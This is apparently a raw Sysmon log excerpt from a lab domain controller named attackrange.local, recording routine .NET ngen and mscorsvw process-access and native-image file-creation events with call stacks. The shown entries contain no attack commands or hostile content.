13:51:05.788{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.788{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9249-6005-4904-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9249-6005-4904-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9249-6005-4904-00000000A301}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.273{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9249-6005-4804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.257{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9249-6005-4804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.257{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9249-6005-4804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:05.195{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1208-0\System.IO.Log.dll2021-01-18 13:51:05.195 10341000x80000000000000008586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.788{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.788{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4E04-00000000A301}4636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4D04-00000000A301}3244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.695{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4D04-00000000A301}3244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.695{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4D04-00000000A301}3244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:06.617{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1264-0\System.Messaging.dll2021-01-18 13:51:06.617 10341000x80000000000000008579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.257{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.242{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.242{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4C04-00000000A301}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.070{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924A-6005-4B04-00000000A301}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.054{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924A-6005-4B04-00000000A301}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:06.054{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924A-6005-4B04-00000000A301}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:05.992{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1180-0\System.Management.Instrumentation.dll2021-01-18 13:51:05.992 10341000x80000000000000008607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.601{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:07.601{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924B-6005-5404-00000000A301}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.3